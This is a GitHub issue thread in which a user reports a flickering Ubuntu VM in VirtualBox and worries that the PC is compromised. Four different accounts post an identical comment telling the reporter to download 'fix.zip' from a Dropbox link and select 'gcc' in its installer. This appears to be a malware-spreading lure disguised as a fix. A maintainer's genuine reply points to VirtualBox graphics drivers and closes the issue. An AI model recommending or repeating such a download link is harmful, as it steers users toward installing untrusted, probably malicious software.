### ISSUE TITLE
Ubuntu VM in Compromised pc

### ISSUE THREAD

**Issue by Dani-008** [canonical/ubuntu.com#14227]
### Summary

Hi all my net has been compromissed I would like to know if this is normal or not it is my first ubuntu vm in VirtualBox.

![20240826_003740](https://github.com/user-attachments/assets/801ef5c8-7e51-4d04-8677-fda59caa9b63)
![20240826_003742](https://github.c
![20240826_003718](https://github.com/user-attachments/assets/ac76131f-ba1d-4ea8-aee7-6222d742756f)
om/user-attachments/assets/18f77543-896c-4fc3-8372-3e62c011cece)

### Steps to reproduce the behavior

Start the VM and is flicking  the pointer turn in to an square nothing goes as expected

### Expected behavior

user login as normal

### Browser/device details

window 11

### Reported from

GitHub

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by mtruj013** [comment]
Hi @Dani-008 , thanks for reporting. It sounds like this might be an issue with the virtual box graphics driver. You can file an issue for VirtualBox [here](https://www.virtualbox.org/wiki/Bugtracker). It might also be helpful to take a look at the discussions on the original [discourse tutorial post](https://discourse.ubuntu.com/t/how-to-run-an-ubuntu-desktop-virtual-machine-using-virtualbox-7/25137). As for this specific ticket, I'm going to go ahead and close it as this is the repo for the ubuntu.com website specifically and this isn't relevant to the project. Thanks
